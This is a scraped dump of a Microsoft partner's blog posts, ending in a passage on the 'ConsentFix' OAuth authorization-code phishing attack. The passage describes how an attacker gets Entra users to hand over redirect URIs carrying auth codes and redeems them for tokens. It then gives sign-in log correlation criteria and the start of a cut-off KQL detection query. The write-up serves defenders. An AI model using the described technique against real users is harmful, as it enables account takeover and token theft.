These services are complemented by ",[251,22104,22105],{},"24/7 security operations"," and incident response capabilities via glueckkanja’s dedicated Cybersecurity Operations Center (SOC), ensuring continuous protection, threat mitigation, and alignment with the latest security standards.",[12,22108,22109,22110,22113,22114,2901,22116,22118,22119,22121,22122,22125],{},"To support a seamless and cloud-native Microsoft experience, glueckkanja has developed a suite of proprietary tools that simplify management and drive automation: ",[251,22111,22112],{},"KONNEKT"," for secure collaboration with Microsoft 365 data, ",[251,22115,4922],{},[251,22117,4845],{}," for passwordless, Intune-integrated network authentication, ",[251,22120,2677],{}," for scalable software distribution, and ",[251,22123,22124],{},"TerraProvider"," for fully automated provisioning of CloudPCs and hardware clients via Intune.",[12,22127,22128,22129,22132,22133,22136],{},"glueckkanja was among the first global partners to receive the ",[251,22130,22131],{},"Microsoft Verified MXDR"," certification, validating its excellence in managed security operations. 
With nearly 250 cloud professionals and a proven track record of success, glueckkanja has been recognized multiple times as a Microsoft Worldwide Partner of the Year finalist/winner, and ranks consistently at the top of the ",[251,22134,22135],{},"ISG Microsoft 365"," Germany quadrant since 2019.",[12,22138,22139,22140,22143],{},"The company is also a recognized innovator among Germany’s TOP 100 most innovative companies, and its ",[251,22141,22142],{},"outstanding 4.7/5 Kununu rating"," (Germany’s leading employer review platform) underlines its culture of excellence and employee satisfaction.",{"title":65,"searchDepth":111,"depth":111,"links":22145},[22146,22147,22148],{"id":22052,"depth":111,"text":22053},{"id":22075,"depth":111,"text":22076},{"id":4981,"depth":111,"text":4982},{"lang":2171,"seoTitle":22150,"titleClass":2173,"date":22151,"categories":22152,"blogtitlepic":22153,"socialimg":22154,"customExcerpt":22155,"keywords":22156,"maxContent":2168,"hreflang":22157,"quotes":22162,"contactInContent":22168,"footer":22188,"scripts":22189,"published":2181},"glueckkanja named Launch Partner for Microsoft Security Store, delivering 10 Copilot Agents","2025-09-30",[2176],"head-security-agents.jpg","/blog/heads/head-security-agents.jpg","glueckkanja is among the first partners in the Microsoft Security Store Preview, delivering 10 Microsoft-native Security Copilot Agents across Security, Entra, Intune, and Purview. 
Developed in close collaboration with customers, these agents are designed to address real-world security challenges from day one – fully integrated, enterprise-ready, and built to simplify and accelerate security operations.","Microsoft Security Store Preview, Security Copilot Agents, glueckkanja Microsoft partner, Microsoft-native security solutions, AI-powered cybersecurity tools, Entra security agents, Intune security automation, Purview compliance agents, Cloud security Microsoft Copilot, Simplify Microsoft Security operations",[22158,22160],{"lang":2260,"href":22159},"/de/posts/2025-09-30-security-store",{"lang":2263,"href":22161},"/es/posts/2025-09-30-security-store",{"items":22163},[22164],{"text":22165,"name":22166,"position":22167,"company":2971},"A Forensic Agent by glueckkanja AG delivers deep-dive analysis of Defender XDR incidents to accelerate investigations, while their Privileged Admin Watchdog Agent helps enforce zero standing privilege principles by getting rid of persistent admin identities. These innovations, along with their other 6 agents in the Security Store today, demonstrate how glueckkanja AG is empowering organizations to tackle a wide range of security and IT challenges.","Dorothy Li","Corporate Vice President, Security Copilot, Ecosystem and Marketplace",{"quote":2181,"infos":22169},{"bgColor":2201,"headline":2202,"subline":22170,"level":41,"textStyling":2204,"flush":2205,"person":22171,"form":22173},"Want to know how our 10 Microsoft-native Security Copilot Agents help simplify operations across Security, Entra, Intune, and Purview? Fill out the form, and we’ll share real-world insights, demos, and examples tailored to your needs.",{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":22172},"What our customers gain is time and clarity: Security teams spend less effort on manual analysis and troubleshooting, and more time focusing on the threats that really matter. 
With our 10 Security Copilot Agents, we help them improve their security posture, reduce costs, and simplify daily operations directly within Microsoft Security.",{"ctaText":2213,"cta":22174,"method":2169,"action":2216,"fields":22175},{"skin":2215},[22176,22177,22178,22179,22180,22181,22182,22183,22185,22186,22187],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2176},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":22184},"Form: Blog Microsoft Security Store | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},{"noMargin":2181},{"slick":2181},"/posts/2025-09-30-security-store",{"title":22046,"description":65},"posts/2025-09-30-security-store",[22194,22195,22196],"AI Agents","Security Copilot","Microsoft Security","rwfFTQ-KUG1pFwNFIR0n3PYQlXt_I_ov5W66hV1cIkY",{"id":22199,"title":22200,"author":22201,"body":22202,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22330,"moment":2166,"navigation":2181,"path":22361,"seo":22362,"stem":22363,"tags":22364,"webcast":2168,"__hash__":22365},"content_en/posts/2025-10-07-prevent-cyber-attacks.md","Preventing Cyber Attacks: How Companies Build Resilience with IT Structures",[2461],{"type":9,"value":22203,"toc":22321},[22204,22206,22210,22212,22215,22218,22222,22224,22228,22230,22238,22241,22245,22247,22255,22258,22265,22269,22271,22278,22285,22289,22291,22298,22301,22305,22307,22310,22313],[22,22205],{},[41,22207,22209],{"id":22208},"why-cyber-attacks-succeed-so-frequently","Why cyber attacks succeed so frequently",[12,22211,31],{},[12,22213,22214],{},"Ransomware attacks are no 
coincidence. Attackers deliberately choose times when companies are understaffed — such as weekends. They exploit vulnerabilities like outdated authentication processes, unpatched systems, or misconfigured access points. A common mistake: the lack of a unified security concept. Instead of a well-thought-out overall strategy, many companies rely on isolated measures that are insufficient against complex attacks.",[12,22216,22217],{},"However, there are well-proven approaches: a security model based on zero-trust principles, as well as clear structuring of access rights and automation to enable rapid response in case of emergency.",[41,22219,22221],{"id":22220},"three-pillars-for-a-robust-it-security-strategy","Three pillars for a robust IT security strategy",[12,22223,31],{},[41,22225,22227],{"id":22226},"secure-infrastructure-the-foundation-for-resilience","Secure Infrastructure – The foundation for resilience",[12,22229,47],{},[12,22231,22232,22233,22237],{},"A resilient IT infrastructure must not only function reliably but also actively close security gaps. In our example, 300 computers had to be isolated. The first step was therefore the complete reinstallation of a clean environment—based on our ",[2672,22234,22236],{"href":22235},"https://www.glueckkanja.com/en/azure/azure-foundation?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Azure Foundation",". This cloud infrastructure follows clear security guidelines and is rolled out in a standardized way using Infrastructure-as-Code (IaC). This allows security configurations to be automatically checked and updated according to best practices.",[12,22239,22240],{},"Another advantage: The use of zero-trust principles ensures that workloads are segmented and only released for authorized connections. 
This keeps the attack surface minimal.",[41,22242,22244],{"id":22243},"security-starts-with-authentication","Security starts with authentication",[12,22246,47],{},[12,22248,22249,22250,22254],{},"In almost every cyberattack, identity management is the first point of attack. Passwords alone are no longer enough. With ",[2672,22251,22253],{"href":22252},"https://www.glueckkanja.com/en/modern-workplace/azure-active-directory?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","Entra ID",", user accounts can be centrally managed and secured. Multi-factor authentication (MFA) is the standard.",[12,22256,22257],{},"Another advantage: Suspicious activities are automatically detected and reviewed. For example, if a user logs in again from another location within a few minutes, this is recognized as a potential threat and access is automatically blocked.",[12,22259,22260,22261,22264],{},"To detect attackers in the infrastructure, advanced systems such as Extended Detection and Response (XDR) and Security Information and Event Management (SIEM) are used. These solutions aggregate alarms and events, analyze them, and enable rapid assessment. A managed SOC—such as the ",[2672,22262,2913],{"href":22263},"https://www.glueckkanja.com/en/security/cloud-security-operations-center?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," from glueckkanja—helps to make optimal use of these technologies.",[41,22266,22268],{"id":22267},"restoring-workstations-quickly","Restoring workstations quickly",[12,22270,47],{},[12,22272,22273,22274,22277],{},"After an attack, employees need to be able to work again quickly. Cloud-based solutions like ",[2672,22275,3425],{"href":22276},"https://www.glueckkanja.com/en/modern-workplace/microsoft-intune?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," are essential for this. 
Devices can be fully reset and configured via a central portal—regardless of where the user is located.",[12,22279,22280,22281,22284],{},"The advantage: Employees can carry out the process themselves without the IT department having to manually set up each device. In addition, platforms like ",[2672,22282,2677],{"href":22283},"https://www.realmjoin.com/?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," automatically distribute all relevant software packages and ensure that security updates are installed.",[41,22286,22288],{"id":22287},"emergency-protection-azere-as-a-contingency-solution","Emergency protection: AzERE as a contingency solution",[12,22290,31],{},[12,22292,22293,22294,22297],{},"An incident like this shows how important it is to have an emergency strategy in place. ",[2672,22295,5754],{"href":22296},"https://www.glueckkanja.com/en/azure/azure-emergency-response-environment?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article"," (Azure Emergency Response Environment) provides an isolated environment in which critical systems such as the domain controller are replicated in a secure “Dark Tenant” instance. This enables access to a clean version of the data, even in the event of a large-scale attack.",[12,22299,22300],{},"Additionally, AzERE enables the setup of a digital “War Room”: a platform where all relevant stakeholders come together to coordinate actions in real time. This central communication capability can make the decisive difference when minutes determine success or failure.",[41,22302,22304],{"id":22303},"conclusion-proactive-resilience-instead-of-reacting-to-threats","Conclusion: Proactive resilience instead of reacting to threats",[12,22306,31],{},[12,22308,22309],{},"This incident shows: An effective security concept requires more than isolated solutions. 
It needs a combination of secure cloud infrastructure, robust identity management, and a modern work environment that can be quickly restored.",[12,22311,22312],{},"And that’s exactly why our IT Workaholics stories are about people whose IT operations we’ve brought back from crisis mode to normal operations.",[12,22314,22315,22316,22320],{},"Read ",[2672,22317,22319],{"href":22318},"https://www.glueckkanja.com/en/it-workaholics?utm_source=heise&utm_medium=paid&utm_campaign=it-workaholics&utm_content=heise-article","IT Workaholics stories"," now!",{"title":65,"searchDepth":111,"depth":111,"links":22322},[22323,22324,22325,22326,22327,22328,22329],{"id":22208,"depth":111,"text":22209},{"id":22220,"depth":111,"text":22221},{"id":22226,"depth":111,"text":22227},{"id":22243,"depth":111,"text":22244},{"id":22267,"depth":111,"text":22268},{"id":22287,"depth":111,"text":22288},{"id":22303,"depth":111,"text":22304},{"lang":2171,"seoTitle":22200,"titleClass":2173,"date":22331,"categories":22332,"blogtitlepic":22333,"socialimg":22334,"customExcerpt":22335,"keywords":22336,"contactInContent":22337,"hreflang":22354,"footer":22359,"scripts":22360,"published":2181},"2025-10-07",[2176],"head-preventing-cyber-attacks","/blog/heads/head-preventing-cyber-attacks.png","Saturday morning, somewhere in Germany. While the weekend is just beginning for many, our team notices the first warning signs on a client company’s systems: unusual activities that immediately trigger all alarm bells. A quick analysis confirms the suspicion—ransomware. Within a very short time, critical systems are compromised. 
What follows is a race against time: securing systems, isolating critical areas, and then starting the recovery process.","Security, CSOC, Microsoft Security, Cyber Attacks, Prevention",{"quote":2181,"infos":22338},{"bgColor":2201,"headline":2202,"subline":22170,"level":41,"textStyling":2204,"flush":2205,"person":22339,"form":22340},{"image":2207,"cloudinary":2181,"alt":2208,"name":2209,"quotee":2209,"quoteeTitle":2210,"quote":22172},{"ctaText":2213,"cta":22341,"method":2169,"action":2216,"fields":22342},{"skin":2215},[22343,22344,22345,22346,22347,22348,22349,22350,22351,22352,22353],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2176},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":22184},{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},[22355,22357],{"lang":2260,"href":22356},"/de/posts/2025-10-07-prevent-cyber-attacks.md",{"lang":2263,"href":22358},"/es/posts/2025-10-07-prevent-cyber-attacks.md",{"noMargin":2181},{"slick":2181},"/posts/2025-10-07-prevent-cyber-attacks",{"title":22200,"description":65},"posts/2025-10-07-prevent-cyber-attacks",[2176,3660],"wCZ9NX6OIdPjL8feOEl9GtkEECpk0-k7zrA1KWzfse4",{"id":22367,"title":22368,"author":22369,"body":22370,"cta":2166,"description":65,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22448,"moment":22449,"navigation":2181,"path":22492,"seo":22493,"stem":22494,"tags":22495,"webcast":2168,"__hash__":22496},"content_en/posts/2025-11-12-partner-of-the-year-awards.md","Cloud-first at the airport: Microsoft Partner of the Year Awards 
2025",[2461],{"type":9,"value":22371,"toc":22442},[22372,22376,22378,22381,22384,22388,22390,22393,22396,22410,22413,22417,22421,22423,22426,22430,22432,22435],[41,22373,22375],{"id":22374},"from-the-runway-to-the-cloud","From the runway to the cloud",[12,22377,31],{},[12,22379,22380],{},"Fraport operates 29 airports worldwide, including Frankfurt Airport, one of Europe's largest transportation hubs. More than 80,000 employees keep operations running every day, from baggage handling to IT security. To make all this work, you need a reliable, scalable, and secure digital infrastructure.",[12,22382,22383],{},"That's where the joint project between Fraport and glueckkanja came in: the existing VDI environment was to be replaced with a modern, cloud-based workplace architecture. The goal: more flexibility, less complexity, and a platform built for a globally connected organization.",[41,22385,22387],{"id":22386},"cloud-managed-workplace","Cloud Managed Workplace",[12,22389,31],{},[12,22391,22392],{},"At the core lies the combination of Windows 365 Cloud PCs and the Microsoft Intune Suite. 
Today, more than 16,500 endpoints are centrally deployed, managed, and secured.",[12,22394,22395],{},"The results:",[1254,22397,22398,22401,22404,22407],{},[1257,22399,22400],{},"Device provisioning in minutes instead of hours",[1257,22402,22403],{},"Automated processes for higher efficiency",[1257,22405,22406],{},"Transparent management and monitoring",[1257,22408,22409],{},"A Zero Trust security model across all devices",[12,22411,22412],{},"The outcome: a workplace concept that enables Fraport employees to work securely and flexibly across all locations, devices, and roles.",[5082,22414],{":quotes":22415,":no-fullscreen":3821,"spacing":22416},"quoteMicrosoft","mb-10",[41,22418,22420],{"id":22419},"recognition-for-innovation-and-collaboration","Recognition for innovation and collaboration",[12,22422,31],{},[12,22424,22425],{},"Each year, Microsoft honors partners who deliver outstanding cloud solutions, services, and innovations. In a global competition with more than 4,600 submissions, glueckkanja was recognized for the successful implementation of the Fraport project, a strong signal for the growing importance of cloud-based workplace solutions in critical infrastructures.",[41,22427,22429],{"id":22428},"a-blueprint-for-modern-workplace-architecture","A blueprint for modern workplace architecture",[12,22431,31],{},[12,22433,22434],{},"This project demonstrates how complex infrastructures can be reimagined through the cloud — without compromising on security or user experience. For Fraport, it marked the move to a standardized, cloud-based workplace model. 
For glueckkanja, it’s a proof point of how modern IT strategies can scale sustainably.",[12,22436,22437,22438,1013],{},"The full list of award-winning projects can be found ",[2672,22439,3116],{"href":22440,"rel":22441},"https://aka.ms/2025POTYAWinnersFinalists",[2676],{"title":65,"searchDepth":111,"depth":111,"links":22443},[22444,22445,22446,22447],{"id":22374,"depth":111,"text":22375},{"id":22386,"depth":111,"text":22387},{"id":22419,"depth":111,"text":22420},{"id":22428,"depth":111,"text":22429},{"lang":2171,"seoTitle":22368,"titleClass":2173,"date":22449,"categories":22450,"blogtitlepic":22451,"socialimg":22452,"customExcerpt":22453,"keywords":22454,"contactInContent":22455,"hreflang":22480,"scripts":22485,"quoteMicrosoft":22486},"2025-11-12",[2962],"head-partner-of-the-year-2025","/heads/head-partner-of-the-year-2025.jpg","Out of more than 4,600 nominations from over 100 countries, one project stood out as a showcase of what modern IT can look like: together with Fraport, glueckkanja was recognized at the Microsoft Partner of the Year Awards 2025 in the Cloud Endpoints category.","Microsoft Partner of the Year Awards 2025, Cloud Endpoints Award, glueckkanja Fraport, Fraport Microsoft Case Study, Windows 365 Cloud PC, Microsoft Intune Suite, Cloud Managed Workplace, Azure Cloud Migration, Zero Trust Security, Modern Workplace, Cloud-first strategy, Digital workplace transformation, Endpoint management, Device provisioning automation, Secure cloud infrastructure, Scalable IT architecture, Cloud governance and compliance, Enterprise mobility and security, Airport IT infrastructure, Aviation digital transformation, Critical infrastructure IT, Global operations, Remote workforce enablement, IT modernization in transportation, Cloud-based workplace for critical infrastructure, Microsoft Windows 365 and Intune in enterprise environments, Secure and scalable endpoint management, Transforming airport IT operations with 
Azure",{"quote":2181,"infos":22456},{"bgColor":2201,"color":5865,"boxBgColor":5864,"boxColor":5865,"headline":22457,"subline":22458,"level":41,"textStyling":2204,"flush":2205,"person":22459,"form":22465},"Get in Touch","Want to learn more about the project and our award? We'd be happy to show you how Fraport’s journey toward a standardized cloud architecture was brought to life.",{"image":5868,"cloudinary":2181,"alt":2420,"name":2420,"quotee":2420,"quoteeTitle":5869,"quote":22460,"detailsHeader":22461,"details":22462},"The project with Fraport shows how standardization and automation can enable a secure, scalable workplace model, exactly what's needed to run and evolve IT environments reliably over the long term.","We’re looking forward\u003Cbr />to hearing from you!",[22463,22464],{"text":5272,"href":5273,"details":5873,"icon":5275},{"text":5277,"href":5278,"icon":5279},{"ctaText":2213,"cta":22466,"method":2169,"action":2216,"fields":22467},{"skin":2215},[22468,22469,22470,22471,22472,22473,22474,22475,22477,22478,22479],{"label":2219,"type":61,"id":2220,"required":2181,"requiredMsg":2221},{"label":2223,"type":61,"id":2224,"required":2181,"requiredMsg":2225},{"label":2227,"type":2228,"id":2228,"required":2181,"requiredMsg":2229},{"label":8110,"type":2232,"id":2233,"required":2168,"requiredMsg":2234},{"label":8229,"type":2237,"id":2238,"required":2181,"requiredMsg":2239},{"type":2241,"id":2242,"value":2962},{"type":2241,"id":2244,"value":2245},{"type":2241,"id":2247,"value":22476},"Form: Blog Microsoft Partner of the Year | EN",{"type":2241,"id":2250,"value":2251},{"type":2241,"id":2253},{"type":2241,"id":2255},[22481,22483],{"lang":2260,"href":22482},"/de/posts/2025-11-12-partner-of-the-year-awards",{"lang":2263,"href":22484},"/es/posts/2025-11-12-partner-of-the-year-awards",{"slick":2181,"form":2181},{"items":22487},[22488],{"text":22489,"name":22490,"company":22491,"alt":22490},"By moving to Windows 365 Cloud PCs and the Intune Suite, we've achieved a new level 
of agility and security. The collaboration with glueckkanja has laid the foundation for future innovation.","Niklas Rast","Senior Solution Architect at Fraport","/posts/2025-11-12-partner-of-the-year-awards",{"title":22368,"description":65},"posts/2025-11-12-partner-of-the-year-awards",[2972,2973],"cj79PQ-BKLtgPV2RMZEjFxFqy0mJuIJu-kN6Q8BGdOA",{"id":22498,"title":22499,"author":22500,"body":22501,"cta":2166,"description":22505,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":22602,"moment":22603,"navigation":2181,"path":22615,"seo":22616,"stem":22617,"tags":22618,"webcast":2168,"__hash__":22619},"content_en/posts/2025-12-08-recruiting-process.md","Our Application Process Explained",[2551],{"type":9,"value":22502,"toc":22594},[22503,22506,22509,22512,22523,22527,22529,22532,22535,22539,22541,22544,22555,22558,22562,22564,22567,22571,22573,22576,22580,22582,22585,22589,22591],[12,22504,22505],{},"We're often asked: What do I need to bring and what's important to you?",[12,22507,22508],{},"What's important to us is that you're excited to work at an innovative tech company. We see ourselves as a team pulling in the same direction.",[12,22510,22511],{},"And we're looking for people who are as passionate about technology as we are:",[1254,22513,22514,22517,22520],{},[1257,22515,22516],{},"Who don't shy away from challenges but thrive when they can dive deep into complex topics.",[1257,22518,22519],{},"Who question the status quo and passionately develop new, innovative solutions – for glueckkanja and our clients.",[1257,22521,22522],{},"Who enjoy being part of a community, sharing their knowledge and learning from each other.",[186,22524,22526],{"id":22525},"step-1-your-application","Step 1: Your Application",[12,22528,31],{},[12,22530,22531],{},"You've submitted your documents – the first step is done! At our company, no AI reviews your application, but our recruiting team personally. Wondering who's behind the recruiting team? 
Here we are!",[12,22533,22534],{},"We - that's Kerstin, Anna, Steffi and Jan - take the time to carefully review your CV and check whether your experience and skills match our requirements. Our goal: You'll receive feedback from us within max. 1–2 weeks, but usually after just a few days. We know how nerve-wracking the waiting can be.",[186,22536,22538],{"id":22537},"step-2-getting-to-know-people-culture","Step 2: Getting to Know People & Culture",[12,22540,31],{},[12,22542,22543],{},"If your profile fits, we move to the first round. Don't worry – you don't need to be nervous! You've already made a great first impression with your CV. In the conversation, we want to get to know you as a person:",[1254,22545,22546,22549,22552],{},[1257,22547,22548],{},"Who are you?",[1257,22550,22551],{},"What makes you tick?",[1257,22553,22554],{},"What are you looking for in your future?",[12,22556,22557],{},"This is about an open, honest meeting at eye level.",[186,22559,22561],{"id":22560},"step-3-technical-exchange-with-your-future-lead","Step 3: Technical Exchange with Your Future Lead",[12,22563,31],{},[12,22565,22566],{},"In the second conversation, you'll meet your lead. Now it gets a bit more technical: We discuss your professional skills and you can ask all questions about tasks, team and projects. A bit of excitement is natural – but hey, you're already one step further!",[186,22568,22570],{"id":22569},"step-4-team-meet-culture-check","Step 4: Team Meet & Culture Check",[12,22572,31],{},[12,22574,22575],{},"At glueckkanja, culture is more than a word – it's our daily life. That's why in the last step you'll meet your potential team. We want to ensure it's a good fit for both sides – professionally and personally.",[186,22577,22579],{"id":22578},"finale-your-offer","Finale: Your Offer",[12,22581,31],{},[12,22583,22584],{},"Have you convinced us? Then comes the personal offer conversation. 
Here we clarify all details about the offer and answer all your final questions.",[186,22586,22588],{"id":22587},"why-so-many-steps","Why So Many Steps?",[12,22590,31],{},[12,22592,22593],{},"Simple: We want to ensure that you feel comfortable with us and that we're successful together. All conversations take place at eye level – and using first names is natural for us.",{"title":65,"searchDepth":111,"depth":111,"links":22595},[22596,22597,22598,22599,22600,22601],{"id":22525,"depth":329,"text":22526},{"id":22537,"depth":329,"text":22538},{"id":22560,"depth":329,"text":22561},{"id":22569,"depth":329,"text":22570},{"id":22578,"depth":329,"text":22579},{"id":22587,"depth":329,"text":22588},{"lang":2171,"seoTitle":22499,"titleClass":2173,"date":22603,"categories":22604,"blogtitlepic":22605,"socialimg":22606,"customExcerpt":22607,"keywords":22608,"hreflang":22609,"scripts":22614},"2025-12-08",[2962],"head-recruiting-process","/heads/head-recruiting-process.png","You've discovered an exciting position with us and want to apply? Great – we're always happy to welcome new talent! But what happens after you click 'Submit Application'? 
Here we give you a behind-the-scenes look.","Recruiting, Application Process, IT Company Jobs",[22610,22612],{"lang":2260,"href":22611},"/de/posts/2025-12-08-recruiting-process.md",{"lang":2263,"href":22613},"/es/posts/2025-12-08-recruiting-process.md",{"slick":2181,"form":2181},"/posts/2025-12-08-recruiting-process",{"title":22499,"description":22505},"posts/2025-12-08-recruiting-process",[3089,3090,3088],"G61hmPFZGmgTDCf7PALQe_EYxtkp8yqklHD0ejtE8AY",{"id":22621,"title":22622,"author":22623,"body":22624,"cta":2166,"description":22628,"eventid":2166,"extension":2167,"hideInRecent":2168,"layout":2169,"meta":23405,"moment":23407,"navigation":2181,"path":23433,"seo":23434,"stem":23435,"tags":23436,"webcast":2168,"__hash__":23439},"content_en/posts/2025-12-31-vulnerability-consentfix.md","AuthCodeFix aka ConsentFix",[2494,2373,2530],{"type":9,"value":22625,"toc":23385},[22626,22629,22632,22635,22641,22644,22647,22656,22661,22669,22689,22692,22698,22701,22704,22710,22715,22719,22729,22735,22738,22741,22745,22748,22754,22761,22764,22784,22794,22798,22801,22804,22807,22810,22814,22817,22820,22837,22846,22850,22854,22874,22878,22882,22893,22896,22902,22906,22920,22924,22935,22939,22942,22950,22953,22961,22964,22972,22976,22979,23000,23003,23067,23070,23073,23076,23079,23082,23088,23091,23132,23136,23151,23155,23159,23173,23176,23179,23184,23187,23198,23202,23209,23213,23219,23224,23238,23244,23250,23256,23267,23270,23276,23279,23304,23312,23316,23336,23342,23345,23351,23355],[12,22627,22628],{},"As it is tradition right before the end of the year, a new vulnerability or clever attack vector appears, and Defenders are left trying to protect their users. Meanwhile, other attackers and red teamers watch closely and adapt.",[12,22630,22631],{},"This year, PushSecurity detected an attack that they named \"ConsentFix\", an evolution of the ClickFix attack that relies on the user to provide the attacker with a URI that basically hands over the key to the Entra kingdom. 
The method used in the wild relied on a manual copy and paste action by the user to work. Within a few days, John Hammond released a video demonstrating an improved version of the attack that no longer required copy and paste, instead, the user could simply drag and drop their auth code to the attacker.",[12,22633,22634],{},"When we look into the technical details of why this attack works and seemingly bypasses device compliance and other Conditional Access requirements, we find ourselves in the OAuth 2.0 authorization code flow.",[12,22636,22637],{},[2642,22638],{"alt":22639,"src":22640},"OAuth 2.0 authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-01.png",[12,22642,22643],{},"The attacker creates a Microsoft Entra login URI that targets the \"Microsoft Azure CLI\" client and the \"Azure Resource Manager\" resource, and opens this URI when the user visits the malicious website.",[12,22645,22646],{},"Mapped to the authorization code flow, this corresponds to the first step that a native public app such as the Azure CLI would normally call to authenticate the user. The application creates a listener on the machine on which it is executed, on a random high port. This port is used as a so called reply URI.",[12,22648,22649,22650,22655],{},"You can easily reproduce this yourself, for example by using ",[2672,22651,22654],{"href":22652,"rel":22653},"https://github.com/f-bader/TokenTacticsV2",[2676],"TokenTacticsV2",", or by crafting the URI manually.",[12,22657,22658],{},[2642,22659],{"alt":22654,"src":22660},"https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-02.png",[12,22662,22663,22664,22668],{},"After the user successfully signs into Entra ID, the user is redirected to the reply URI, e.g., ",[2672,22665,22666],{"href":22666,"rel":22667},"http://localhost:3001",[2676],". 
In a normal scenario, the Azure CLI would now accept the call to this URI and would receive the important and critical information that is part of the redirect:",[1254,22670,22671,22681],{},[1257,22672,22673,22675,22677,22678,22680],{},[251,22674,63],{},[531,22676],{},"\nThis is the authorization_code, which the application uses to request a bearer token, which consists of access, ID, and optionally the refresh token.",[531,22679],{},"\nAccording to the documentation, this code is valid for around 10 minutes and must be redeemed within this time.",[1257,22682,22683,22686,22688],{},[251,22684,22685],{},"state",[531,22687],{},"\nThis is an optional parameter, and the application should verify whether it is identical in the request and response.",[12,22690,22691],{},"In the attack scenario, the user is also redirected, but since no application is running on localhost, the browser encounters an error.",[12,22693,22694],{},[2642,22695],{"alt":22696,"src":22697},"The browser runs into an error","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-03.png",[12,22699,22700],{},"But the URI still contains the sensitive information and this is what the attacker wants the user to provide them. 
If the user obliges the attacker will now redeem the token material and can then use the access and refresh token to access the resource, in this case Azure Resource Manager.",[12,22702,22703],{},"In this screenshot you will see how to retrieve the bearer token using the URI provided by the user.",[12,22705,22706],{},[2642,22707],{"alt":22708,"src":22709},"Bearer token using the URI provided by the user","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-04.png",[2110,22711,22712],{},[12,22713,22714],{},"If you want to test your detections, make sure you execute the last step from a different system, in a different network.",[41,22716,22718],{"id":22717},"detection-artifacts","Detection artifacts",[12,22720,22721,22722,2901,22725,22728],{},"When you reproduce the attack and check the ",[63,22723,22724],{},"SigninLogs",[63,22726,22727],{},"AADNonInteractiveUserSignInLogs",", you'll see two events for this single sign-in activity. The first event represents the actual user sign-in, while the second originates from the attacker's infrastructure.",[12,22730,22731],{},[2642,22732],{"alt":22733,"src":22734},"Activity Log","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-05.png",[12,22736,22737],{},"The big difference is that the first event is an interactive sign in event, while the second is non-interactive. This translates to the two stages of the authentication flow: first the user, then the application or in our case the attacker.",[12,22739,22740],{},"Regular behavior of the Azure CLI would be that both sign-in events originate from the same IP address. However, in our case the IP addresses are different, and they originate from different countries. 
Of course, the latter is not a reliable indicator, as the attacker could reside in the same country as the victim to hide their tracks.",[186,22742,22744],{"id":22743},"missing-link","Missing link",[12,22746,22747],{},"When looking for a good way to link those two events, the natural first idea was to check the Unique Token Identifier (UTI). However, Microsoft uses different values for the authorization code UTI and the bearer token UTI, so this approach doesn't work as a reliable link.",[12,22749,22750],{},[2642,22751],{"alt":22752,"src":22753},"Unique Token Identifier","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-06.png",[12,22755,22756,22757,22760],{},"However, the ",[63,22758,22759],{},"SessionId"," is a good link between the two, though it is a long-running ID and might contain multiple of these event combinations, even legitimate ones.",[12,22762,22763],{},"With the additional knowledge of the auth code flow limitations and the user and application id as additional links you can use time as an important detection factor:",[1254,22765,22766,22769,22772,22775,22778,22781],{},[1257,22767,22768],{},"Both events share the same SessionId",[1257,22770,22771],{},"Both events share the same ApplicationId",[1257,22773,22774],{},"Both events share the same UserId",[1257,22776,22777],{},"The second event must be after the first event",[1257,22779,22780],{},"The second event must be within approximately a 10-minute time window after the first event. You should not use exactly 10 minutes as Microsoft writes \"[...] they expire after about 10 minutes\"",[1257,22782,22783],{},"You should only consider the very next second event, not subsequent ones",[2110,22785,22786],{},[12,22787,22788,22791,22793],{},[251,22789,22790],{},"Fun fact",[531,22792],{},"\nThe ResourceIdentity is not a good link, as the attacker can change the resource since it is not bound to the auth code. 
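Putting the correlation criteria above into a query, as an added example that is not part of the original post: it joins the interactive sign-in (the user obtaining the authorization code) to the very next non-interactive sign-in (the code being redeemed) on the same SessionId, AppId and UserId, keeps only redemptions inside the roughly ten-minute code lifetime, and flags those that come from a different IP address. Table and column names are the standard Microsoft Entra sign-in log schema in Sentinel (SigninLogs, AADNonInteractiveUserSignInLogs); the lookback window, the code lifetime slack and the few-seconds floor that drops fully automated redemptions are assumptions you should tune to your tenant.

```kql
// Added example (not from the original post). Correlates the interactive
// sign-in that requested the auth code with the very next non-interactive
// sign-in that redeemed it, per SessionId/AppId/UserId.
let lookback = 1d;          // assumption: how far back to hunt
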